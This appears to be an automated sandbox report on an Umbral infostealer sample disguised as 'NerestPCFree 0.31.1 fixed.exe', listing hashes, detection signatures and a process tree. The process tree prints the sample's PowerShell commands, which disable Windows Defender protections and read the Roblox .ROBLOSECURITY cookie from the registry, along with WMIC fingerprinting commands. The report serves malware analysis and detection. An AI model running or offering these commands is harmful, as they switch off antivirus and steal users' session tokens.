Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-12-2024 21:08
Behavioral task
behavioral1
Sample
NerestPCFree 0.31.1 fixed.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
NerestPCFree 0.31.1 fixed.exe
Resource
win7-20240708-en
Behavioral task
behavioral3
Sample
NerestPCFree 0.31.1 fixed.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
NerestPCFree 0.31.1 fixed.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
NerestPCFree 0.31.1 fixed.exe
-
Size
231KB
-
MD5
08dce587975cb4a6cb1333bd7d3aea6c
-
SHA1
4c855f6bb5cad027522d0a063cb4f1cd6e97b163
-
SHA256
0c6e6a1c2c50a0a1ab3f74ea0985e14003921c3b7f4e427b56c7673439accb8b
-
SHA512
19f21d6f976a971f4bffbf74a7b6450ec6b6ec02d837422a5c5edbd3fb825e630642e4b840e181484a2e0e47997631ad7012f1f710aa098538164c8998592f81
-
SSDEEP
6144:xloZMCrIkd8g+EtXHkv/iD4LsUtt74szYKrd4UBr8b8e1mOoi:DoZZL+EP8LsUtt74szYKrd4UBAJ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/2172-1-0x00000000012E0000-0x0000000001320000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2844 powershell.exe 2708 powershell.exe 2132 powershell.exe 1976 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2016 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2844 powershell.exe 2708 powershell.exe 2132 powershell.exe 2984 powershell.exe 1976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2172 NerestPCFree 0.31.1 fixed.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 1932 wmic.exe Token: SeSecurityPrivilege 1932 wmic.exe Token: SeTakeOwnershipPrivilege 1932 wmic.exe Token: SeLoadDriverPrivilege 1932 wmic.exe Token: SeSystemProfilePrivilege 1932 wmic.exe Token: SeSystemtimePrivilege 1932 wmic.exe Token: SeProfSingleProcessPrivilege 1932 wmic.exe Token: SeIncBasePriorityPrivilege 1932 wmic.exe Token: SeCreatePagefilePrivilege 1932 wmic.exe Token: SeBackupPrivilege 1932 wmic.exe Token: SeRestorePrivilege 1932 wmic.exe Token: SeShutdownPrivilege 1932 wmic.exe Token: SeDebugPrivilege 1932 wmic.exe Token: SeSystemEnvironmentPrivilege 1932 wmic.exe Token: SeRemoteShutdownPrivilege 1932 wmic.exe Token: SeUndockPrivilege 1932 wmic.exe Token: SeManageVolumePrivilege 1932 wmic.exe Token: 33 1932 wmic.exe Token: 34 1932 wmic.exe Token: 35 1932 wmic.exe Token: SeIncreaseQuotaPrivilege 1932 wmic.exe Token: SeSecurityPrivilege 1932 wmic.exe Token: SeTakeOwnershipPrivilege 1932 wmic.exe Token: SeLoadDriverPrivilege 1932 wmic.exe Token: SeSystemProfilePrivilege 1932 wmic.exe Token: SeSystemtimePrivilege 1932 wmic.exe Token: SeProfSingleProcessPrivilege 1932 wmic.exe Token: SeIncBasePriorityPrivilege 1932 wmic.exe Token: SeCreatePagefilePrivilege 1932 wmic.exe Token: SeBackupPrivilege 1932 wmic.exe Token: SeRestorePrivilege 1932 wmic.exe Token: SeShutdownPrivilege 1932 wmic.exe Token: SeDebugPrivilege 1932 wmic.exe Token: SeSystemEnvironmentPrivilege 1932 wmic.exe Token: SeRemoteShutdownPrivilege 1932 wmic.exe Token: SeUndockPrivilege 1932 wmic.exe Token: SeManageVolumePrivilege 1932 wmic.exe Token: 33 1932 wmic.exe Token: 34 1932 wmic.exe Token: 35 1932 wmic.exe Token: SeIncreaseQuotaPrivilege 1028 wmic.exe Token: SeSecurityPrivilege 1028 wmic.exe Token: SeTakeOwnershipPrivilege 1028 wmic.exe Token: SeLoadDriverPrivilege 1028 wmic.exe Token: SeSystemProfilePrivilege 1028 wmic.exe Token: SeSystemtimePrivilege 1028 wmic.exe Token: SeProfSingleProcessPrivilege 1028 wmic.exe Token: SeIncBasePriorityPrivilege 1028 wmic.exe Token: SeCreatePagefilePrivilege 1028 wmic.exe Token: SeBackupPrivilege 1028 wmic.exe Token: SeRestorePrivilege 1028 wmic.exe Token: SeShutdownPrivilege 1028 wmic.exe Token: SeDebugPrivilege 1028 wmic.exe Token: SeSystemEnvironmentPrivilege 1028 wmic.exe Token: SeRemoteShutdownPrivilege 1028 wmic.exe Token: SeUndockPrivilege 1028 wmic.exe Token: SeManageVolumePrivilege 1028 wmic.exe Token: 33 1028 wmic.exe Token: 34 1028 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2844 2172 NerestPCFree 0.31.1 fixed.exe 31 PID 2172 wrote to memory of 2844 2172 NerestPCFree 0.31.1 fixed.exe 31 PID 2172 wrote to memory of 2844 2172 NerestPCFree 0.31.1 fixed.exe 31 PID 2172 wrote to memory of 2708 2172 NerestPCFree 0.31.1 fixed.exe 33 PID 2172 wrote to memory of 2708 2172 NerestPCFree 0.31.1 fixed.exe 33 PID 2172 wrote to memory of 2708 2172 NerestPCFree 0.31.1 fixed.exe 33 PID 2172 wrote to memory of 2132 2172 NerestPCFree 0.31.1 fixed.exe 35 PID 2172 wrote to memory of 2132 2172 NerestPCFree 0.31.1 fixed.exe 35 PID 2172 wrote to memory of 2132 2172 NerestPCFree 0.31.1 fixed.exe 35 PID 2172 wrote to memory of 2984 2172 NerestPCFree 0.31.1 fixed.exe 37 PID 2172 wrote to memory of 2984 2172 NerestPCFree 0.31.1 fixed.exe 37 PID 2172 wrote to memory of 2984 2172 NerestPCFree 0.31.1 fixed.exe 37 PID 2172 wrote to memory of 1932 2172 NerestPCFree 0.31.1 fixed.exe 39 PID 2172 wrote to memory of 1932 2172 NerestPCFree 0.31.1 fixed.exe 39 PID 2172 wrote to memory of 1932 2172 NerestPCFree 0.31.1 fixed.exe 39 PID 2172 wrote to memory of 1028 2172 NerestPCFree 0.31.1 fixed.exe 42 PID 2172 wrote to memory of 1028 2172 NerestPCFree 0.31.1 fixed.exe 42 PID 2172 wrote to memory of 1028 2172 NerestPCFree 0.31.1 fixed.exe 42 PID 2172 wrote to memory of 2920 2172 NerestPCFree 0.31.1 fixed.exe 44 PID 2172 wrote to memory of 2920 2172 NerestPCFree 0.31.1 fixed.exe 44 PID 2172 wrote to memory of 2920 2172 NerestPCFree 0.31.1 fixed.exe 44 PID 2172 wrote to memory of 1976 2172 NerestPCFree 0.31.1 fixed.exe 46 PID 2172 wrote to memory of 1976 2172 NerestPCFree 0.31.1 fixed.exe 46 PID 2172 wrote to memory of 1976 2172 NerestPCFree 0.31.1 fixed.exe 46 PID 2172 wrote to memory of 2016 2172 NerestPCFree 0.31.1 fixed.exe 48 PID 2172 wrote to memory of 2016 2172 NerestPCFree 0.31.1 fixed.exe 48 PID 2172 wrote to memory of 2016 2172 NerestPCFree 0.31.1 fixed.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe"C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2016
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51ed5264e4a1b790e727a332c7cd739f9
SHA1f7884565d39ea78518c1038167027b9a217ae16d
SHA25629572316cd7c6643ddc4efdd96acbcc191bd55eaa367335dd467e65c4c32eeb2
SHA51240684c5fabdad10d112aa4ddf345222e8c96c64951c28786e42d3833abf3eabd46422f6d1a4fdd6f83b8a944dab5d722ae6850c21a28654d5d4e908dfb7feb8f